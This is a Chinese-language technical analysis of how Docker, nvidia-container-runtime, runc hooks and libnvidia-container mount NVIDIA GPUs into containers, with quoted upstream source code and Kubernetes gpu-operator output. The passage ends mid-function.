通过分析代码确认,CDI 模式将挂载配置、设备直接写入到 oci spec,而不会执行 nvidia-container-cli configure,也就不会自行实现挂载,同时也不支持 cuda 兼容特性。
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
$ docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ubuntu cat /proc/self/mountinfo |grep overlay
643 534 0:48 / / rw,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/VWXTSEW55YTGJ23XYVXBZE6TIH:/var/lib/docker/overlay2/l/F3QZDOFKONMKPK4LRXRABM3LRQ,upperdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/diff,workdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/work
1.4 gpu-operator
参考 "官方文档"(https://docs.nvidia.com/datacenter/cloud-native/gpu-operator/latest/getting-started.html), 安装gpu-operator。
gpu-operator 将通过名为 nvidia-container-toolkit-daemonset 的容器挂载主机目录,把 nvidia-container-toolkit 安装到主机的 /usr/local/nvidia 目录。
$ kubectl --kubeconfig wanglei-k8s-gpu-kubeconfig.yaml describe pod -n gpu-operator nvidia-container-toolkit-daemonset-fzznt
Name: nvidia-container-toolkit-daemonset-fzznt
Namespace: gpu-operator
Priority: 2000001000
Priority Class Name: system-node-critical
Node: 10.0.2.70/10.0.2.70
Start Time: Thu, 28 Nov 2024 21:00:54 +0800
Labels: app=nvidia-container-toolkit-daemonset
app.kubernetes.io/managed-by=gpu-operator
controller-revision-hash=5798fb59f4
helm.sh/chart=gpu-operator-v24.9.0
pod-template-generation=1
Annotations: <none>
Status: Running
IP: 172.16.0.146
IPs:
IP: 172.16.0.146
Controlled By: DaemonSet/nvidia-container-toolkit-daemonset
Init Containers:
driver-validation:
Container ID: containerd://0b6689ed6d9dc8c9103934a900a865faf4fc2604356097b3b151e9b5ffb28310
Image: nvcr.io/nvidia/cloud-native/gpu-operator-validator:v24.9.0
Image ID: nvcr.io/nvidia/cloud-native/gpu-operator-validator@sha256:70a0bd29259820d6257b04b0cdb6a175f9783d4dd19ccc4ec6599d407c359ba5
Port: <none>
Host Port: <none>
Command:
sh
-c
Args:
nvidia-validator
State: Terminated
Reason: Completed
Exit Code: 0
Started: Thu, 28 Nov 2024 21:00:55 +0800
Finished: Thu, 28 Nov 2024 21:04:41 +0800
Ready: True
Restart Count: 0
Environment:
WITH_WAIT: true
COMPONENT: driver
OPERATOR_NAMESPACE: gpu-operator (v1:metadata.namespace)
Mounts:
/host from host-root (ro)
/host-dev-char from host-dev-char (rw)
/run/nvidia/driver from driver-install-dir (rw)
/run/nvidia/validations from run-nvidia-validations (rw)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Containers:
nvidia-container-toolkit-ctr:
Container ID: containerd://c236b579e2cd400d98d7a34fb9e4b9037322ad620445da3f1fc91518142ba615
Image: nvcr.io/nvidia/k8s/container-toolkit:v1.17.0-ubuntu20.04
Image ID: nvcr.io/nvidia/k8s/container-toolkit@sha256:c458c33da393dda19e53dae4cb82f02203714ce0f5358583bf329f3693ec84cb
Port: <none>
Host Port: <none>
Command:
/bin/bash
-c
Args:
/bin/entrypoint.sh
State: Running
Started: Thu, 28 Nov 2024 21:04:54 +0800
Ready: True
Restart Count: 0
Environment:
...
Mounts:
/bin/entrypoint.sh from nvidia-container-toolkit-entrypoint (ro,path="entrypoint.sh")
/driver-root from driver-install-dir (rw)
/host from host-root (ro)
/run/nvidia/toolkit from toolkit-root (rw)
/run/nvidia/validations from run-nvidia-validations (rw)
/runtime/config-dir/ from containerd-config (rw)
/runtime/sock-dir/ from containerd-socket (rw)
/usr/local/nvidia from toolkit-install-dir (rw)
/usr/share/containers/oci/hooks.d from crio-hooks (rw)
/var/run/cdi from cdi-root (rw)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Conditions:
...
Volumes:
nvidia-container-toolkit-entrypoint:
Type: ConfigMap (a volume populated by a ConfigMap)
Name: nvidia-container-toolkit-entrypoint
Optional: false
toolkit-root:
Type: HostPath (bare host directory volume)
Path: /run/nvidia/toolkit
HostPathType: DirectoryOrCreate
run-nvidia-validations:
Type: HostPath (bare host directory volume)
Path: /run/nvidia/validations
HostPathType: DirectoryOrCreate
driver-install-dir:
Type: HostPath (bare host directory volume)
Path: /run/nvidia/driver
HostPathType: DirectoryOrCreate
host-root:
Type: HostPath (bare host directory volume)
Path: /
HostPathType:
toolkit-install-dir:
Type: HostPath (bare host directory volume)
Path: /usr/local/nvidia
HostPathType:
crio-hooks:
Type: HostPath (bare host directory volume)
Path: /run/containers/oci/hooks.d
HostPathType:
host-dev-char:
Type: HostPath (bare host directory volume)
Path: /dev/char
HostPathType:
cdi-root:
Type: HostPath (bare host directory volume)
Path: /var/run/cdi
HostPathType: DirectoryOrCreate
containerd-config:
Type: HostPath (bare host directory volume)
Path: /etc/containerd
HostPathType: DirectoryOrCreate
containerd-socket:
Type: HostPath (bare host directory volume)
Path: /run/containerd
HostPathType:
...
在启动 gpu 容器前监控主机进程,验证发现 gpu-operator 场景下仍通过 nvidia-container-cli 来实现挂载。
root@wanglei-k8s-gpu-02862:~# while true; do ps -ef |grep nvidia-container-cli|grep -v grep; done
root 91175 91173 0 21:04 ? 00:00:00 /bin/sh /usr/local/nvidia/toolkit/nvidia-container-cli --root=/run/nvidia/driver --load-kmods configure --ldconfig=@/run/nvidia/driver/sbin/ldconfig.real --device=GPU-1401ffea-de99-b446-2a8c-15e0797f35bb --compat32 --compute --display --graphics --ngx --utility --video --pid=91165 /mnt/paas/runtime/overlay2/332208ab1f6248114caa9ed78edfcfe09cee0ecf6939e46c942b1e4394df65da/merged
2. 调用链分析
- nvidia-container-cli(https://github.com/NVIDIA/libnvidia-container/tree/main/src/cli)
- libnvidia-container(https://github.com/NVIDIA/libnvidia-container)
2.1 docker-cli --gpus 传递至 docker daemon
docker run 和 docker create 命令提供了 --gpus 参数,用于指定要传递给容器的 gpu 设备,下面以 docker create 命令为例分析调用链。
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L79
func NewCreateCommand(dockerCli command.Cli) *cobra.Command {
...
cmd := &cobra.Command{
Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
Short: "Create a new container",
...
}
...
copts = addFlags(flags)
...
}
通过指定 --gpus 参数,设置到 hostConfig 中传递至 docker daemon。
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L190
func addFlags(flags *pflag.FlagSet) *containerOptions {
copts := &containerOptions{
...
gpus opts.GpuOpts
...
}
...
flags.Var(&copts.gpus, "gpus", "GPU devices to add to the container ('all' to pass all GPUs)")
...
}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L593
func parse(flags *pflag.FlagSet, copts *containerOptions, serverOS string) (*containerConfig, error) {
...
deviceRequests := copts.gpus.Value()
if len(cdiDeviceNames) > 0 {
cdiDeviceRequest := container.DeviceRequest{
Driver: "cdi",
DeviceIDs: cdiDeviceNames,
}
deviceRequests = append(deviceRequests, cdiDeviceRequest)
}
resources := container.Resources{
...
DeviceRequests: deviceRequests,
}
...
hostConfig := &container.HostConfig{
...
Resources: resources,
...
}
...
return &containerConfig{
Config: config,
HostConfig: hostConfig,
NetworkingConfig: networkingConfig,
}, nil
}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L265C2-L265C120
func runCreate(ctx context.Context, dockerCli command.Cli, flags *pflag.FlagSet, options *createOptions, copts *containerOptions) error {
...
containerCfg, err := parse(flags, copts, dockerCli.ServerInfo().OSType)
...
id, err := createContainer(ctx, dockerCli, containerCfg, options)
...
}
func createContainer(ctx context.Context, dockerCli command.Cli, containerCfg *containerConfig, options *createOptions) (containerID string, err error) {
...
response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, platform, options.name)
...
}
2.2 docker daemon 创建 spec
在容器启动时,创建 spec,设置 prestart hook 配置。
https://github.com/moby/moby/blob/v27.1.0/daemon/start.go#L143C2-L143C65
func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error {
...
return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true)
}
func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) {
...
spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts)
...
}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L1042
func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, err error) {
...
opts = append(opts,
...
WithDevices(daemon, c),
...
)
...
}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L934-L938
func WithDevices(daemon *Daemon, c *container.Container) coci.SpecOpts {
return func(ctx context.Context, _ coci.Client, _ *containers.Container, s *coci.Spec) error {
...
for _, req := range c.HostConfig.DeviceRequests {
if err := daemon.handleDevice(req, s); err != nil {
return err
}
}
...
}
}
https://github.com/moby/moby/blob/v27.1.0/daemon/devices.go#L29
func (daemon *Daemon) handleDevice(req container.DeviceRequest, spec *specs.Spec) error {
if req.Driver == "" {
for _, dd := range deviceDrivers {
if selected := dd.capset.Match(req.Capabilities); selected != nil {
return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
}
}
} else if dd := deviceDrivers[req.Driver]; dd != nil {
if req.Driver == "cdi" {
return dd.updateSpec(spec, &deviceInstance{req: req})
}
if selected := dd.capset.Match(req.Capabilities); selected != nil {
return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
}
}
return incompatibleDeviceRequest{req.Driver, req.Capabilities}
}
https://github.com/moby/moby/blob/v27.1.0/daemon/nvidia_linux.go#L92-L99
const nvidiaHook = "nvidia-container-runtime-hook"
func init() {
if _, err := exec.LookPath(nvidiaHook); err != nil {
// do not register Nvidia driver if helper binary is not present.
return
}
capset := capabilities.Set{"gpu": struct{}{}, "nvidia": struct{}{}}
nvidiaDriver := &deviceDriver{
capset: capset,
updateSpec: setNvidiaGPUs,
}
for c := range allNvidiaCaps {
nvidiaDriver.capset[string(c)] = struct{}{}
}
registerDeviceDriver("nvidia", nvidiaDriver)
}
func setNvidiaGPUs(s *specs.Spec, dev *deviceInstance) error {
req := dev.req
if req.Count != 0 && len(req.DeviceIDs) > 0 {
return errConflictCountDeviceIDs
}
if len(req.DeviceIDs) > 0 {
s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+strings.Join(req.DeviceIDs, ","))
} else if req.Count > 0 {
s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+countToDevices(req.Count))
} else if req.Count < 0 {
s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES=all")
}
var nvidiaCaps []string
// req.Capabilities contains device capabilities, some but not all are NVIDIA driver capabilities.
for _, c := range dev.selectedCaps {
nvcap := nvidia.Capability(c)
if _, isNvidiaCap := allNvidiaCaps[nvcap]; isNvidiaCap {
nvidiaCaps = append(nvidiaCaps, c)
continue
}
// TODO: nvidia.WithRequiredCUDAVersion
// for now we let the prestart hook verify cuda versions but errors are not pretty.
}
if nvidiaCaps != nil {
s.Process.Env = append(s.Process.Env, "NVIDIA_DRIVER_CAPABILITIES="+strings.Join(nvidiaCaps, ","))
}
path, err := exec.LookPath(nvidiaHook)
if err != nil {
return err
}
if s.Hooks == nil {
s.Hooks = &specs.Hooks{}
}
// This implementation uses prestart hooks, which are deprecated.
// CreateRuntime is the closest equivalent, and executed in the same
// locations as prestart-hooks, but depending on what these hooks do,
// possibly one of the other hooks could be used instead (such as
// CreateContainer or StartContainer).
s.Hooks.Prestart = append(s.Hooks.Prestart, specs.Hook{ //nolint:staticcheck // FIXME(thaJeztah); replace prestart hook with a non-deprecated one.
Path: path,
Args: []string{
nvidiaHook,
"prestart",
},
Env: os.Environ(),
})
return nil
}
docker 设置完 spec 后,将启动runtime。
2.3 nvidia-container-runtime 调用 runc
nvidia-container-toolkit 在安装时会将 runtime 设置为 nvidia-container-runtime。
nvidia-container-runtime 作为一层shim, 将会把docker传递过来的spec配置透传给更底层的runtime,通常默认是runc。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/config/config.go#L110
func GetDefault() (*Config, error) {
d := Config{
...
NVIDIAContainerRuntimeConfig: RuntimeConfig{
...
Runtimes: []string{"docker-runc", "runc", "crun"},
...
},
...
}
...
}
那么 nvidia-container-runtime 存在的意义是什么呢,主要是为了修改 spec,这实际上和 docker 前面修改的 prestart hooks 有一些冗余,不过 nvidia-container-runtime 会修改更多内容。
下面我们来跟踪完整的 nvidia-container-runtime 调用链。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime/main.go#L11
func main() {
r := runtime.New()
err := r.Run(os.Args)
if err != nil {
os.Exit(1)
}
}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime.go#L82
func (r rt) Run(argv []string) (rerr error) {
...
runtime, err := newNVIDIAContainerRuntime(r.logger, cfg, argv, driver)
...
return runtime.Exec(argv)
}
- 如果执行的命令不是 create,则直接调用 runc
- 如果执行 create 命令,则修改 spec,修改包括 modeModifier, graphicsModifier, featureModifier
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L49
func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) {
lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes)
...
if !oci.HasCreateSubcommand(argv) {
logger.Tracef("Skipping modifier for non-create subcommand")
return lowLevelRuntime, nil
}
ociSpec, err := oci.NewSpec(logger, argv)
...
specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver)
...
// Create the wrapping runtime with the specified modifier.
r := oci.NewModifyingRuntimeWrapper(
logger,
lowLevelRuntime,
ociSpec,
specModifier,
)
return r, nil
}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/oci/runtime_modifier.go#L56
func (r *modifyingRuntimeWrapper) Exec(args []string) error {
if HasCreateSubcommand(args) {
r.logger.Debugf("Create command detected; applying OCI specification modifications")
err := r.modify()
if err != nil {
return fmt.Errorf("could not apply required modification to OCI specification: %w", err)
}
r.logger.Debugf("Applied required modification to OCI specification")
}
r.logger.Debugf("Forwarding command to runtime %v", r.runtime.String())
return r.runtime.Exec(args)
}
2.4 nvidia-container-runtime 具体会对 spec 修改什么
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L66
// newSpecModifier is a factory method that creates constructs an OCI spec modifer based on the provided config.
func newSpecModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec, driver *root.Driver) (oci.SpecModifier, error) {
rawSpec, err := ociSpec.Load()
if err != nil {
returnnil, fmt.Errorf("failed to load OCI spec: %v", err)
}
image, err := image.NewCUDAImageFromSpec(rawSpec)
if err != nil {
returnnil, err
}
mode := info.ResolveAutoMode(logger, cfg.NVIDIAContainerRuntimeConfig.Mode, image)
modeModifier, err := newModeModifier(logger, mode, cfg, ociSpec, image)
if err != nil {
return nil, err
}
// For CDI mode we make no additional modifications.
if mode == "cdi" {
return modeModifier, nil
}
graphicsModifier, err := modifier.NewGraphicsModifier(logger, cfg, image, driver)
if err != nil {
return nil, err
}
featureModifier, err := modifier.NewFeatureGatedModifier(logger, cfg, image)
if err != nil {
return nil, err
}
modifiers := modifier.Merge(
modeModifier,
graphicsModifier,
featureModifier,
)
return modifiers, nil
}
modeModifier 有3种。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L105
func newModeModifier(logger logger.Interface, mode string, cfg *config.Config, ociSpec oci.Spec, image image.CUDA) (oci.SpecModifier, error) {
switch mode {
case"legacy":
return modifier.NewStableRuntimeModifier(logger, cfg.NVIDIAContainerRuntimeHookConfig.Path), nil
case"csv":
return modifier.NewCSVModifier(logger, cfg, image)
case"cdi":
return modifier.NewCDIModifier(logger, cfg, ociSpec)
}
returnnil, fmt.Errorf("invalid runtime mode: %v", cfg.NVIDIAContainerRuntimeConfig.Mode)
}
如果 mode 为 cdi,则仅执行 modeModifier。CDIModifier 负责修改 spec 中的 hooks, devices, mounts 配置(这些配置已在 /etc/cdi/nvidia.yaml 中声明)。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/cdi.go#L37
func NewCDIModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec) (oci.SpecModifier, error) {
devices, err := getDevicesFromSpec(logger, ociSpec, cfg)
if err != nil {
returnnil, fmt.Errorf("failed to get required devices from OCI specification: %v", err)
}
iflen(devices) == 0 {
logger.Debugf("No devices requested; no modification required.")
returnnil, nil
}
logger.Debugf("Creating CDI modifier for devices: %v", devices)
automaticDevices := filterAutomaticDevices(devices)
iflen(automaticDevices) != len(devices) && len(automaticDevices) > 0 {
returnnil, fmt.Errorf("requesting a CDI device with vendor 'runtime.nvidia.com' is not supported when requesting other CDI devices")
}
iflen(automaticDevices) > 0 {
automaticModifier, err := newAutomaticCDISpecModifier(logger, cfg, automaticDevices)
if err == nil {
return automaticModifier, nil
}
logger.Warningf("Failed to create the automatic CDI modifier: %w", err)
logger.Debugf("Falling back to the standard CDI modifier")
}
return cdi.New(
cdi.WithLogger(logger),
cdi.WithDevices(devices...),
cdi.WithSpecDirs(cfg.NVIDIAContainerRuntimeConfig.Modes.CDI.SpecDirs...),
)
}
LegacyModifier 会修改 runc prestart hook
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/stable.go#L33
func NewStableRuntimeModifier(logger logger.Interface, nvidiaContainerRuntimeHookPath string) oci.SpecModifier {
m := stableRuntimeModifier{
logger: logger,
nvidiaContainerRuntimeHookPath: nvidiaContainerRuntimeHookPath,
}
return &m
}
CSVModifier 支持通过csv文件主动提供设备的具体配置,与CDI模式类似,直接修改 oci spec 中的 devices 配置。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/csv.go#L42
func NewCSVModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
logger.Infof("No modification required; no devices requested")
return nil, nil
}
logger.Infof("Constructing modifier from config: %+v", *cfg)
if err := checkRequirements(logger, image); err != nil {
return nil, fmt.Errorf("requirements not met: %v", err)
}
csvFiles, err := csv.GetFileList(cfg.NVIDIAContainerRuntimeConfig.Modes.CSV.MountSpecPath)
if err != nil {
return nil, fmt.Errorf("failed to get list of CSV files: %v", err)
}
if image.Getenv(nvidiaRequireJetpackEnvvar) != "csv-mounts=all" {
csvFiles = csv.BaseFilesOnly(csvFiles)
}
cdilib, err := nvcdi.New(
nvcdi.WithLogger(logger),
nvcdi.WithDriverRoot(cfg.NVIDIAContainerCLIConfig.Root),
nvcdi.WithNVIDIACDIHookPath(cfg.NVIDIACTKConfig.Path),
nvcdi.WithMode(nvcdi.ModeCSV),
nvcdi.WithCSVFiles(csvFiles),
)
if err != nil {
returnnil, fmt.Errorf("failed to construct CDI library: %v", err)
}
spec, err := cdilib.GetSpec()
if err != nil {
returnnil, fmt.Errorf("failed to get CDI spec: %v", err)
}
cdiModifier, err := cdi.New(
cdi.WithLogger(logger),
cdi.WithSpec(spec.Raw()),
)
if err != nil {
returnnil, fmt.Errorf("failed to construct CDI modifier: %v", err)
}
modifiers := Merge(
nvidiaContainerRuntimeHookRemover{logger},
cdiModifier,
)
return modifiers, nil
}
GraphicsModifier 负责为图形相关能力补充 DRM 设备节点及图形相关的挂载配置。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/graphics.go#L32
func NewGraphicsModifier(logger logger.Interface, cfg *config.Config, image image.CUDA, driver *root.Driver) (oci.SpecModifier, error) {
if required, reason := requiresGraphicsModifier(image); !required {
logger.Infof("No graphics modifier required: %v", reason)
return nil, nil
}
nvidiaCDIHookPath := cfg.NVIDIACTKConfig.Path
mounts, err := discover.NewGraphicsMountsDiscoverer(
logger,
driver,
nvidiaCDIHookPath,
)
if err != nil {
returnnil, fmt.Errorf("failed to create mounts discoverer: %v", err)
}
// In standard usage, the devRoot is the same as the driver.Root.
devRoot := driver.Root
drmNodes, err := discover.NewDRMNodesDiscoverer(
logger,
image.DevicesFromEnvvars(visibleDevicesEnvvar),
devRoot,
nvidiaCDIHookPath,
)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer: %v", err)
}
d := discover.Merge(
drmNodes,
mounts,
)
return NewModifierFromDiscoverer(logger, d)
}
FeatureGatedModifier 根据配置中的开关,修改 oci中的设备和挂载配置。如启用相关特性,则新增对应的设备或挂载配置。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/gated.go#L38
// NewFeatureGatedModifier creates the modifiers for optional features.
// These include:
//
// NVIDIA_GDS=enabled
// NVIDIA_MOFED=enabled
// NVIDIA_NVSWITCH=enabled
// NVIDIA_GDRCOPY=enabled
//
// If not devices are selected, no changes are made.
func NewFeatureGatedModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
logger.Infof("No modification required; no devices requested")
return nil, nil
}
var discoverers []discover.Discover
driverRoot := cfg.NVIDIAContainerCLIConfig.Root
devRoot := cfg.NVIDIAContainerCLIConfig.Root
if cfg.Features.IsEnabled(config.FeatureGDS, image) {
d, err := discover.NewGDSDiscoverer(logger, driverRoot, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for GDS devices: %w", err)
}
discoverers = append(discoverers, d)
}
if cfg.Features.IsEnabled(config.FeatureMOFED, image) {
d, err := discover.NewMOFEDDiscoverer(logger, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for MOFED devices: %w", err)
}
discoverers = append(discoverers, d)
}
if cfg.Features.IsEnabled(config.FeatureNVSWITCH, image) {
d, err := discover.NewNvSwitchDiscoverer(logger, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for NVSWITCH devices: %w", err)
}
discoverers = append(discoverers, d)
}
if cfg.Features.IsEnabled(config.FeatureGDRCopy, image) {
d, err := discover.NewGDRCopyDiscoverer(logger, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for GDRCopy devices: %w", err)
}
discoverers = append(discoverers, d)
}
return NewModifierFromDiscoverer(logger, discover.Merge(discoverers...))
}
2.5 runc 在 prestart hook 阶段调用 nvidia-container-runtime-hook
https://github.com/opencontainers/runc/blob/v1.1.13/libcontainer/process_linux.go#L462
func (p *initProcess) start() (retErr error) {
...
ierr := parseSync(p.messageSockPair.parent, func(sync *syncT) error {
switch sync.Type {
case procSeccomp:
...
case procReady:
...
if err := hooks[configs.Prestart].RunHooks(s); err != nil {
return err
}
...
case procHooks:
...
if err := hooks[configs.Prestart].RunHooks(s); err != nil {
return err
}
...
default:
...
}
}
...
}
2.6 nvidia-container-runtime-hook 调用 nvidia-container-cli
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L179
func main() {
...
switch args[0] {
case"prestart":
doPrestart()
os.Exit(0)
case"poststart":
fallthrough
case"poststop":
os.Exit(0)
default:
flag.Usage()
os.Exit(2)
}
}
执行 nvidia-container-cli 的 configure 命令。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L149
func doPrestart() {
...
args := []string{getCLIPath(cli)}
...
args = append(args, "configure")
...
err = syscall.Exec(args[0], args, env)
...
}
2.7 nvidia-container-cli 调用 libnvidia-container
nvidia-container-cli 做了一个转换,把 libnvidia-container 中函数的 nvc_xxx 前缀移除了, 改为通过 libnvc.xxx 的形式调用。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/main.c#L140
int
main(int argc, char *argv[])
{
...
if ((rv = load_libnvc()) != 0)
goto fail;
...
}
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/libnvc.c#L137
int
load_libnvc(void)
{
if (is_tegra() && !nvml_available())
return load_libnvc_v0();
return load_libnvc_v1();
}
...
static int
load_libnvc_v1(void)
{
#define load_libnvc_func(func) \
libnvc.func = nvc_##func
load_libnvc_func(config_free);
...
}
nvidia-container-cli configure 会执行很多 mount 操作。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/configure.c#L376-L433
int
configure_command(const struct context *ctx)
{
...
if (libnvc.driver_mount(nvc, cnt, drv) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
for (size_t i = 0; i < devices.ngpus; ++i) {
if (libnvc.device_mount(nvc, cnt, devices.gpus[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
if (!mig_config_devices.all && !mig_monitor_devices.all) {
for (size_t i = 0; i < devices.nmigs; ++i) {
if (libnvc.mig_device_access_caps_mount(nvc, cnt, devices.migs[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
}
if (mig_config_devices.all && mig_config_devices.ngpus) {
if (libnvc.mig_config_global_caps_mount(nvc, cnt) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
for (size_t i = 0; i < mig_config_devices.ngpus; ++i) {
if (libnvc.device_mig_caps_mount(nvc, cnt, mig_config_devices.gpus[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
}
if (mig_monitor_devices.all && mig_monitor_devices.ngpus) {
if (libnvc.mig_monitor_global_caps_mount(nvc, cnt) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
for (size_t i = 0; i < mig_monitor_devices.ngpus; ++i) {
if (libnvc.device_mig_caps_mount(nvc, cnt, mig_monitor_devices.gpus[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
}
for (size_t i = 0; i < nvc_cfg->imex.nchans; ++i) {
if (libnvc.imex_channel_mount(nvc, cnt, &nvc_cfg->imex.chans[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
...
if (libnvc.ldcache_update(nvc, cnt) < 0) {
warnx("ldcache error: %s", libnvc.error(nvc));
goto fail;
}
...
}
2.8 libnvidia-container nvc_driver_mount 函数挂载相关文件
nvc_driver_mount() 挂载:
- procfs: 将主机 /proc/driver/nvidia 下的相关文件挂载至容器内
- app_profile: 将主机 /etc/nvidia/nvidia-application-profiles-rc.d 相关的配置文件挂载至容器内
- Host binary and library: 将主机二进制程序、依赖库挂载至容器内
- Container library mounts: 为了实现前向兼容,用户可以提供更新版本的cuda库,将容器/usr/local/cuda/compat目录下较新的CUDA库,挂载到容器 lib 目录。
- Firmware: 将主机 /lib/firmware/nvidia 下的相关文件挂载至容器内
- IPC: 将主机 /var/run/nvidia-persistenced/socket 等相关文件挂载至容器内
- Device: 将主机 /dev/nvidia-uvm、/dev/nvidia-uvm-tools 等设备文件挂载至容器内
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L712
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
...
if (ns_enter(&ctx->err, cnt->mnt_ns, CLONE_NEWNS) < 0)
return (-1);
...
/* Procfs mount */
if (ctx->dxcore.initialized)
log_warn("skipping procfs mount on WSL");
else if ((*ptr++ = mount_procfs(&ctx->err, ctx->cfg.root, cnt)) == NULL)
goto fail;
/* Application profile mount */
if (cnt->flags & OPT_GRAPHICS_LIBS) {
if (ctx->dxcore.initialized)
log_warn("skipping app profile mount on WSL");
else if ((*ptr++ = mount_app_profile(&ctx->err, cnt)) == NULL)
goto fail;
}
/* Host binary and library mounts */
if (info->bins != NULL && info->nbins > 0) {
if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.bins_dir, info->bins, info->nbins)) == NULL)
goto fail;
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
}
if (info->libs != NULL && info->nlibs > 0) {
if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs_dir, info->libs, info->nlibs)) == NULL)
goto fail;
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
}
if ((cnt->flags & OPT_COMPAT32) && info->libs32 != NULL && info->nlibs32 > 0) {
if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs32_dir, info->libs32, info->nlibs32)) == NULL)
goto fail;
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
}
if (symlink_libraries(&ctx->err, cnt, mnt, (size_t)(ptr - mnt)) < 0)
goto fail;
/* Container library mounts */
if (cnt->libs != NULL && cnt->nlibs > 0) {
size_t nlibs = cnt->nlibs;
char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
if (libs == NULL)
goto fail;
filter_libraries(info, libs, &nlibs);
if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
free(libs);
goto fail;
}
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
free(libs);
}
/* Firmware mounts */
for (size_t i = 0; i < info->nfirmwares; ++i) {
